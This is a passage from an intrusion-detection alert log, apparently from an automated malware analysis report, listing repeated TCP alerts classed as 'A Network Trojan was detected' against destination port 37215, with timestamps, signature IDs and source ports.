          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448664
          SID:2829579
          Source Port:37122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178590
          SID:2829579
          Source Port:35136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130142
          SID:2835222
          Source Port:50610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115202
          SID:2835222
          Source Port:38924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113191
          SID:2829579
          Source Port:51508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892047
          SID:2835222
          Source Port:43494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550864
          SID:2835222
          Source Port:38452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517711
          SID:2829579
          Source Port:56320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741927
          SID:2829579
          Source Port:58822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444945
          SID:2835222
          Source Port:36482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463367
          SID:2835222
          Source Port:41574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184078
          SID:2835222
          Source Port:50446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707704
          SID:2829579
          Source Port:47312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551556
          SID:2835222
          Source Port:53510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782187
          SID:2829579
          Source Port:39332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813024
          SID:2829579
          Source Port:39002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018181
          SID:2835222
          Source Port:60370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806251
          SID:2829579
          Source Port:37410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791981
          SID:2835222
          Source Port:55112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601044
          SID:2829579
          Source Port:35798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813128
          SID:2829579
          Source Port:40474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901961
          SID:2835222
          Source Port:42548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746699
          SID:2835222
          Source Port:47768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038175
          SID:2829579
          Source Port:42542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709284
          SID:2835222
          Source Port:59156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604750
          SID:2829579
          Source Port:34166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818775
          SID:2829579
          Source Port:56862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160678
          SID:2835222
          Source Port:40884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731423
          SID:2829579
          Source Port:55538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108874
          SID:2829579
          Source Port:47210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787968
          SID:2835222
          Source Port:40780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670527
          SID:2835222
          Source Port:43126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806305
          SID:2835222
          Source Port:40202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800632
          SID:2829579
          Source Port:57162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405962
          SID:2835222
          Source Port:53950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017588
          SID:2835222
          Source Port:57616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598754
          SID:2829579
          Source Port:58734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442007
          SID:2835222
          Source Port:39156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469011
          SID:2835222
          Source Port:56770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183641
          SID:2829579
          Source Port:55508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355024
          SID:2829579
          Source Port:47426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179459
          SID:2829579
          Source Port:47108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731247
          SID:2829579
          Source Port:54338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176834
          SID:2829579
          Source Port:59290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157443
          SID:2835222
          Source Port:38752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129342
          SID:2829579
          Source Port:47596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354015
          SID:2835222
          Source Port:50138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044805
          SID:2835222
          Source Port:34130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846384
          SID:2829579
          Source Port:44554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237507
          SID:2829579
          Source Port:56620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.807541
          SID:2829579
          Source Port:36700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445978
          SID:2829579
          Source Port:40788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736631
          SID:2835222
          Source Port:38792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516175
          SID:2829579
          Source Port:47560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511547
          SID:2829579
          Source Port:51096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130910
          SID:2829579
          Source Port:38170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242549
          SID:2829579
          Source Port:33736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788209
          SID:2835222
          Source Port:60918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087380
          SID:2835222
          Source Port:33672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816542
          SID:2829579
          Source Port:33464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081570
          SID:2829579
          Source Port:52992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157852
          SID:2829579
          Source Port:33478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133894
          SID:2835222
          Source Port:36694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509514
          SID:2835222
          Source Port:56358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671383
          SID:2835222
          Source Port:57410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806340
          SID:2835222
          Source Port:47520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780252
          SID:2835222
          Source Port:60218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172834
          SID:2829579
          Source Port:42970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161048
          SID:2829579
          Source Port:37272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352930
          SID:2835222
          Source Port:37698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275253
          SID:2829579
          Source Port:34574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018519
          SID:2835222
          Source Port:41034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044825
          SID:2835222
          Source Port:60706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447187
          SID:2829579
          Source Port:40836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.153108
          SID:2835222
          Source Port:33310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016892
          SID:2829579
          Source Port:37174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159442
          SID:2835222
          Source Port:44566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174722
          SID:2835222
          Source Port:52218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127196
          SID:2835222
          Source Port:48454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242797
          SID:2835222
          Source Port:33264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704897
          SID:2829579
          Source Port:34766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405220
          SID:2835222
          Source Port:34178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819346
          SID:2835222
          Source Port:47732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462100
          SID:2829579
          Source Port:45894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795280
          SID:2829579
          Source Port:36308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.026117
          SID:2835222
          Source Port:51204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159585
          SID:2835222
          Source Port:45636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740799
          SID:2835222
          Source Port:51310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740936
          SID:2835222
          Source Port:46752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038968
          SID:2835222
          Source Port:48450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353144
          SID:2835222
          Source Port:44892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466827
          SID:2835222
          Source Port:40302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854239
          SID:2829579
          Source Port:55920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269355
          SID:2829579
          Source Port:49570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272654
          SID:2835222
          Source Port:35880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858057
          SID:2829579
          Source Port:52902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263672
          SID:2829579
          Source Port:55398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745259
          SID:2829579
          Source Port:60010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447092
          SID:2835222
          Source Port:34272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405185
          SID:2829579
          Source Port:43514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441950
          SID:2835222
          Source Port:53560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240455
          SID:2829579
          Source Port:52102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495644
          SID:2835222
          Source Port:42910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176886
          SID:2835222
          Source Port:42256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855435
          SID:2829579
          Source Port:52238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352893
          SID:2835222
          Source Port:53540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896268
          SID:2835222
          Source Port:35854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159525
          SID:2829579
          Source Port:48544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.847162
          SID:2835222
          Source Port:49742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730337
          SID:2829579
          Source Port:59670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041285
          SID:2829579
          Source Port:47046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820623
          SID:2829579
          Source Port:49430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404742
          SID:2835222
          Source Port:55888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016113
          SID:2829579
          Source Port:60014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133137
          SID:2829579
          Source Port:55186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191900
          SID:2835222
          Source Port:34226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.465944
          SID:2829579
          Source Port:41220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175679
          SID:2835222
          Source Port:36330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553036
          SID:2835222
          Source Port:52398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184046
          SID:2835222
          Source Port:60942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350807
          SID:2829579
          Source Port:58156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129265
          SID:2829579
          Source Port:40946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192344
          SID:2829579
          Source Port:56894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402528
          SID:2835222
          Source Port:41858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263931
          SID:2835222
          Source Port:36560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671168
          SID:2829579
          Source Port:55474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.835641
          SID:2829579
          Source Port:49478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.294834
          SID:2829579
          Source Port:45674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239410
          SID:2835222
          Source Port:41376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599285
          SID:2829579
          Source Port:40272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740451
          SID:2835222
          Source Port:36016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353707
          SID:2829579
          Source Port:44118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299442
          SID:2835222
          Source Port:40000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.079057
          SID:2835222
          Source Port:35738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704773
          SID:2835222
          Source Port:60822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469037
          SID:2835222
          Source Port:36450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173573
          SID:2835222
          Source Port:38122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670342
          SID:2835222
          Source Port:60500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406289
          SID:2829579
          Source Port:43080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744123
          SID:2835222
          Source Port:48810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495986
          SID:2835222
          Source Port:47012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745679
          SID:2829579
          Source Port:48906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.189219
          SID:2829579
          Source Port:50610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172975
          SID:2829579
          Source Port:48904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407418
          SID:2829579
          Source Port:35004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465735
          SID:2829579
          Source Port:57338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259043
          SID:2829579
          Source Port:50344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.079035
          SID:2829579
          Source Port:42060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846363
          SID:2835222
          Source Port:40062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403267
          SID:2829579
          Source Port:50016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108992
          SID:2829579
          Source Port:42048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295327
          SID:2835222
          Source Port:49234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176204
          SID:2835222
          Source Port:38700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730693
          SID:2829579
          Source Port:47284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037249
          SID:2835222
          Source Port:39598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130775
          SID:2829579
          Source Port:35952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850320
          SID:2829579
          Source Port:46206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108155
          SID:2829579
          Source Port:42018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888025
          SID:2835222
          Source Port:54290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410084
          SID:2829579
          Source Port:47326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184629
          SID:2835222
          Source Port:49520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441391
          SID:2829579
          Source Port:41334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887873
          SID:2829579
          Source Port:35818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912830
          SID:2829579
          Source Port:39154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893346
          SID:2829579
          Source Port:37270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353337
          SID:2835222
          Source Port:47562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911710
          SID:2829579
          Source Port:43172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075058
          SID:2835222
          Source Port:33052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673886
          SID:2835222
          Source Port:53624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782069
          SID:2829579
          Source Port:38472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787001
          SID:2829579
          Source Port:48750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353071
          SID:2835222
          Source Port:53408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.794947
          SID:2829579
          Source Port:42234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126070
          SID:2835222
          Source Port:58264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353651
          SID:2835222
          Source Port:42170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448437
          SID:2829579
          Source Port:35472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110858
          SID:2829579
          Source Port:57330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135473
          SID:2835222
          Source Port:55872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354635
          SID:2829579
          Source Port:49986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546595
          SID:2829579
          Source Port:53848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784410
          SID:2829579
          Source Port:45914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177508
          SID:2829579
          Source Port:41842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.807005
          SID:2829579
          Source Port:52316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446171
          SID:2829579
          Source Port:37350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037989
          SID:2835222
          Source Port:55262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378064
          SID:2829579
          Source Port:35246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401536
          SID:2835222
          Source Port:56098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912012
          SID:2829579
          Source Port:35610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812901
          SID:2835222
          Source Port:51256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600940
          SID:2829579
          Source Port:44094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447092
          SID:2835222
          Source Port:55812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466536
          SID:2835222
          Source Port:33474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158732
          SID:2829579
          Source Port:41876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240122
          SID:2829579
          Source Port:42366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272275
          SID:2829579
          Source Port:41642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511459
          SID:2829579
          Source Port:34248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.411575
          SID:2829579
          Source Port:42138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
